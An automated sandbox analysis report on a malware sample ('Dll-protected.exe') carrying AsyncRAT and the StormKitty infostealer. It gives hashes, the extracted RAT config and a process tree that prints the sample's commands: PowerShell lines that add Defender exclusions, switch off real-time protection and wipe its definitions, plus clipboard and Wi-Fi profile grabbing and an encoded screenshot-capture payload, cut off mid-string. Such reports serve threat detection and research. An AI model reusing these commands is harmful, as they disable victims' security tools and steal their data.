Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250211-en -
resource tags
arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system -
submitted
14-02-2025 20:40
Static task
static1
Behavioral task
behavioral1
Sample
Dll-protected.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
Dll-protected.exe
Resource
win10v2004-20250211-en
General
-
Target
Dll-protected.exe
-
Size
6.0MB
-
MD5
afea16e410aba3018cf34994fc4a927d
-
SHA1
a5034285db7995d9c3354d42dfbe704f1f0c74b3
-
SHA256
7f9c40d5033299845849d6e250d3c5fca50c15470932ea4388e6238e9f6dba90
-
SHA512
de658afe66f7b5f1766d0dbc64d3929b6e17012e3298f927748606f3a3d3d2217459182ae8e337569ce194374c2cbcf120eeed682a23fee6901cb087776b9846
-
SSDEEP
196608:pwZ+KcF6Nw9nPN7xIEDZe9j9du6v++7fN7AszbMq+:BYyf9EjxRr6AIJ
Malware Config
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001da17-28.dat family_stormkitty behavioral2/memory/1988-52-0x0000000000E40000-0x0000000000E72000-memory.dmp family_stormkitty -
Stormkitty family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000400000001da17-28.dat family_asyncrat -
pid Process 4448 powershell.exe 4148 powershell.exe 2480 powershell.exe 2728 powershell.exe 1964 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 51 4216 Process not Found -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2508704002-2325818048-3575902788-1000\Control Panel\International\Geo\Nation Dll-protected.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4384 powershell.exe 4148 cmd.exe -
Executes dropped EXE 4 IoCs
pid Process 3068 Built.exe 1988 Server.exe 4424 Built.exe 3896 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe 4424 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops desktop.ini file(s) 7 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\37a25bb0656439a75e78e384fee7a9c5\Admin@VUECEVCJ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File opened for modification C:\Users\Admin\AppData\Local\37a25bb0656439a75e78e384fee7a9c5\Admin@VUECEVCJ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\37a25bb0656439a75e78e384fee7a9c5\Admin@VUECEVCJ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\37a25bb0656439a75e78e384fee7a9c5\Admin@VUECEVCJ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\37a25bb0656439a75e78e384fee7a9c5\Admin@VUECEVCJ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\37a25bb0656439a75e78e384fee7a9c5\Admin@VUECEVCJ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\37a25bb0656439a75e78e384fee7a9c5\Admin@VUECEVCJ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini Server.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 67 pastebin.com 66 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com 34 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1396 tasklist.exe 4376 tasklist.exe 4584 tasklist.exe -
resource yara_rule behavioral2/files/0x000200000001eb77-53.dat upx behavioral2/memory/4424-57-0x00007FFA35720000-0x00007FFA35B86000-memory.dmp upx behavioral2/files/0x000400000001db4b-59.dat upx behavioral2/files/0x000300000001e9b9-79.dat upx behavioral2/memory/4424-80-0x00007FFA4C200000-0x00007FFA4C20F000-memory.dmp upx behavioral2/files/0x000300000001e57b-78.dat upx behavioral2/files/0x000300000001e579-77.dat upx behavioral2/files/0x000500000001e543-76.dat upx behavioral2/files/0x000500000001e53f-75.dat upx behavioral2/files/0x000a00000001e457-74.dat upx behavioral2/files/0x000400000001e454-73.dat upx behavioral2/files/0x000900000001ebad-71.dat upx behavioral2/files/0x000200000001eba7-70.dat upx behavioral2/files/0x000500000001eb91-68.dat upx behavioral2/files/0x000200000001ea0f-65.dat upx behavioral2/files/0x000200000001e9bb-64.dat upx behavioral2/files/0x000300000001e9cf-61.dat upx behavioral2/memory/4424-62-0x00007FFA4A890000-0x00007FFA4A8B4000-memory.dmp upx behavioral2/memory/4424-82-0x00007FFA4B660000-0x00007FFA4B678000-memory.dmp upx behavioral2/memory/4424-84-0x00007FFA48630000-0x00007FFA4865C000-memory.dmp upx behavioral2/files/0x000500000001da4c-81.dat upx behavioral2/memory/4424-92-0x00007FFA355A0000-0x00007FFA3571A000-memory.dmp upx behavioral2/memory/4424-99-0x00007FFA46E40000-0x00007FFA46E6E000-memory.dmp upx behavioral2/memory/4424-107-0x00007FFA4A890000-0x00007FFA4A8B4000-memory.dmp upx behavioral2/memory/4424-106-0x00007FFA35220000-0x00007FFA35599000-memory.dmp upx behavioral2/memory/4424-104-0x00007FFA44D30000-0x00007FFA44DE8000-memory.dmp upx behavioral2/memory/4424-103-0x00007FFA35720000-0x00007FFA35B86000-memory.dmp upx behavioral2/memory/4424-109-0x00007FFA484D0000-0x00007FFA484E5000-memory.dmp upx behavioral2/memory/4424-111-0x00007FFA465F0000-0x00007FFA465FD000-memory.dmp upx behavioral2/memory/4424-116-0x00007FFA44530000-0x00007FFA44648000-memory.dmp upx behavioral2/memory/4424-115-0x00007FFA48630000-0x00007FFA4865C000-memory.dmp upx behavioral2/memory/4424-96-0x00007FFA484F0000-0x00007FFA484FD000-memory.dmp upx behavioral2/memory/4424-94-0x00007FFA485F0000-0x00007FFA48609000-memory.dmp upx behavioral2/memory/4424-90-0x00007FFA48610000-0x00007FFA4862F000-memory.dmp upx behavioral2/memory/4424-152-0x00007FFA48610000-0x00007FFA4862F000-memory.dmp upx behavioral2/memory/4424-153-0x00007FFA355A0000-0x00007FFA3571A000-memory.dmp upx behavioral2/memory/4424-155-0x00007FFA485F0000-0x00007FFA48609000-memory.dmp upx behavioral2/memory/4424-170-0x00007FFA46E40000-0x00007FFA46E6E000-memory.dmp upx behavioral2/memory/4424-268-0x00007FFA44D30000-0x00007FFA44DE8000-memory.dmp upx behavioral2/memory/4424-331-0x00007FFA35220000-0x00007FFA35599000-memory.dmp upx behavioral2/memory/4424-369-0x00007FFA4A890000-0x00007FFA4A8B4000-memory.dmp upx behavioral2/memory/4424-377-0x00007FFA46E40000-0x00007FFA46E6E000-memory.dmp upx behavioral2/memory/4424-374-0x00007FFA355A0000-0x00007FFA3571A000-memory.dmp upx behavioral2/memory/4424-373-0x00007FFA48610000-0x00007FFA4862F000-memory.dmp upx behavioral2/memory/4424-368-0x00007FFA35720000-0x00007FFA35B86000-memory.dmp upx behavioral2/memory/4424-484-0x00007FFA35720000-0x00007FFA35B86000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4264 MicrosoftEdgeUpdate.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3940 cmd.exe 4892 netsh.exe 2608 cmd.exe 2204 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Server.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Server.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1904 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2096 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1964 powershell.exe 2480 powershell.exe 2728 powershell.exe 1964 powershell.exe 2728 powershell.exe 2480 powershell.exe 2480 powershell.exe 4384 powershell.exe 4384 powershell.exe 2116 powershell.exe 2116 powershell.exe 4384 powershell.exe 1988 Server.exe 1988 Server.exe 2116 powershell.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 1988 Server.exe 1988 Server.exe 1536 powershell.exe 1536 powershell.exe 1536 powershell.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1160 powershell.exe 1160 powershell.exe 1988 Server.exe 1988 Server.exe 1160 powershell.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe 1988 Server.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1988 Server.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 4376 tasklist.exe Token: SeDebugPrivilege 1396 tasklist.exe Token: SeDebugPrivilege 4384 powershell.exe Token: SeIncreaseQuotaPrivilege 3228 WMIC.exe Token: SeSecurityPrivilege 3228 WMIC.exe Token: SeTakeOwnershipPrivilege 3228 WMIC.exe Token: SeLoadDriverPrivilege 3228 WMIC.exe Token: SeSystemProfilePrivilege 3228 WMIC.exe Token: SeSystemtimePrivilege 3228 WMIC.exe Token: SeProfSingleProcessPrivilege 3228 WMIC.exe Token: SeIncBasePriorityPrivilege 3228 WMIC.exe Token: SeCreatePagefilePrivilege 3228 WMIC.exe Token: SeBackupPrivilege 3228 WMIC.exe Token: SeRestorePrivilege 3228 WMIC.exe Token: SeShutdownPrivilege 3228 WMIC.exe Token: SeDebugPrivilege 3228 WMIC.exe Token: SeSystemEnvironmentPrivilege 3228 WMIC.exe Token: SeRemoteShutdownPrivilege 3228 WMIC.exe Token: SeUndockPrivilege 3228 WMIC.exe Token: SeManageVolumePrivilege 3228 WMIC.exe Token: 33 3228 WMIC.exe Token: 34 3228 WMIC.exe Token: 35 3228 WMIC.exe Token: 36 3228 WMIC.exe Token: SeDebugPrivilege 4584 tasklist.exe Token: SeIncreaseQuotaPrivilege 3228 WMIC.exe Token: SeSecurityPrivilege 3228 WMIC.exe Token: SeTakeOwnershipPrivilege 3228 WMIC.exe Token: SeLoadDriverPrivilege 3228 WMIC.exe Token: SeSystemProfilePrivilege 3228 WMIC.exe Token: SeSystemtimePrivilege 3228 WMIC.exe Token: SeProfSingleProcessPrivilege 3228 WMIC.exe Token: SeIncBasePriorityPrivilege 3228 WMIC.exe Token: SeCreatePagefilePrivilege 3228 WMIC.exe Token: SeBackupPrivilege 3228 WMIC.exe Token: SeRestorePrivilege 3228 WMIC.exe Token: SeShutdownPrivilege 3228 WMIC.exe Token: SeDebugPrivilege 3228 WMIC.exe Token: SeSystemEnvironmentPrivilege 3228 WMIC.exe Token: SeRemoteShutdownPrivilege 3228 WMIC.exe Token: SeUndockPrivilege 3228 WMIC.exe Token: SeManageVolumePrivilege 3228 WMIC.exe Token: 33 3228 WMIC.exe Token: 34 3228 WMIC.exe Token: 35 3228 WMIC.exe Token: 36 3228 WMIC.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeIncreaseQuotaPrivilege 2632 WMIC.exe Token: SeSecurityPrivilege 2632 WMIC.exe Token: SeTakeOwnershipPrivilege 2632 WMIC.exe Token: SeLoadDriverPrivilege 2632 WMIC.exe Token: SeSystemProfilePrivilege 2632 WMIC.exe Token: SeSystemtimePrivilege 2632 WMIC.exe Token: SeProfSingleProcessPrivilege 2632 WMIC.exe Token: SeIncBasePriorityPrivilege 2632 WMIC.exe Token: SeCreatePagefilePrivilege 2632 WMIC.exe Token: SeBackupPrivilege 2632 WMIC.exe Token: SeRestorePrivilege 2632 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4892 wrote to memory of 3068 4892 Dll-protected.exe 91 PID 4892 wrote to memory of 3068 4892 Dll-protected.exe 91 PID 4892 wrote to memory of 1988 4892 Dll-protected.exe 92 PID 4892 wrote to memory of 1988 4892 Dll-protected.exe 92 PID 4892 wrote to memory of 1988 4892 Dll-protected.exe 92 PID 3068 wrote to memory of 4424 3068 Built.exe 93 PID 3068 wrote to memory of 4424 3068 Built.exe 93 PID 4424 wrote to memory of 2240 4424 Built.exe 94 PID 4424 wrote to memory of 2240 4424 Built.exe 94 PID 4424 wrote to memory of 3268 4424 Built.exe 95 PID 4424 wrote to memory of 3268 4424 Built.exe 95 PID 4424 wrote to memory of 2416 4424 Built.exe 98 PID 4424 wrote to memory of 2416 4424 Built.exe 98 PID 2240 wrote to memory of 1964 2240 cmd.exe 100 PID 2240 wrote to memory of 1964 2240 cmd.exe 100 PID 3268 wrote to memory of 2480 3268 cmd.exe 101 PID 3268 wrote to memory of 2480 3268 cmd.exe 101 PID 2416 wrote to memory of 2728 2416 cmd.exe 102 PID 2416 wrote to memory of 2728 2416 cmd.exe 102 PID 4424 wrote to memory of 4232 4424 Built.exe 106 PID 4424 wrote to memory of 4232 4424 Built.exe 106 PID 4424 wrote to memory of 1120 4424 Built.exe 107 PID 4424 wrote to memory of 1120 4424 Built.exe 107 PID 4424 wrote to memory of 4552 4424 Built.exe 146 PID 4424 wrote to memory of 4552 4424 Built.exe 146 PID 4424 wrote to memory of 4148 4424 Built.exe 176 PID 4424 wrote to memory of 4148 4424 Built.exe 176 PID 4424 wrote to memory of 2444 4424 Built.exe 113 PID 4424 wrote to memory of 2444 4424 Built.exe 113 PID 4424 wrote to memory of 4688 4424 Built.exe 115 PID 4424 wrote to memory of 4688 4424 Built.exe 115 PID 1120 wrote to memory of 1396 1120 cmd.exe 118 PID 1120 wrote to memory of 1396 1120 cmd.exe 118 PID 4232 wrote to memory of 4376 4232 cmd.exe 119 PID 4232 wrote to memory of 4376 4232 cmd.exe 119 PID 4148 wrote to memory of 4384 4148 cmd.exe 120 PID 4148 wrote to memory of 4384 4148 cmd.exe 120 PID 4424 wrote to memory of 2608 4424 Built.exe 121 PID 4424 wrote to memory of 2608 4424 Built.exe 121 PID 4552 wrote to memory of 3228 4552 cmd.exe 122 PID 4552 wrote to memory of 3228 4552 cmd.exe 122 PID 4424 wrote to memory of 1764 4424 Built.exe 123 PID 4424 wrote to memory of 1764 4424 Built.exe 123 PID 4424 wrote to memory of 4200 4424 Built.exe 125 PID 4424 wrote to memory of 4200 4424 Built.exe 125 PID 2444 wrote to memory of 4584 2444 cmd.exe 128 PID 2444 wrote to memory of 4584 2444 cmd.exe 128 PID 4688 wrote to memory of 3832 4688 cmd.exe 129 PID 4688 wrote to memory of 3832 4688 cmd.exe 129 PID 2608 wrote to memory of 2204 2608 cmd.exe 154 PID 2608 wrote to memory of 2204 2608 cmd.exe 154 PID 1764 wrote to memory of 2096 1764 cmd.exe 131 PID 1764 wrote to memory of 2096 1764 cmd.exe 131 PID 4200 wrote to memory of 2116 4200 cmd.exe 132 PID 4200 wrote to memory of 2116 4200 cmd.exe 132 PID 4424 wrote to memory of 3508 4424 Built.exe 184 PID 4424 wrote to memory of 3508 4424 Built.exe 184 PID 3508 wrote to memory of 3288 3508 cmd.exe 135 PID 3508 wrote to memory of 3288 3508 cmd.exe 135 PID 4424 wrote to memory of 2412 4424 Built.exe 136 PID 4424 wrote to memory of 2412 4424 Built.exe 136 PID 2412 wrote to memory of 2056 2412 cmd.exe 138 PID 2412 wrote to memory of 2056 2412 cmd.exe 138 PID 4424 wrote to memory of 5032 4424 Built.exe 139
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"C:\Users\Admin\AppData\Local\Temp\Dll-protected.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"4⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:3832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:2096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAa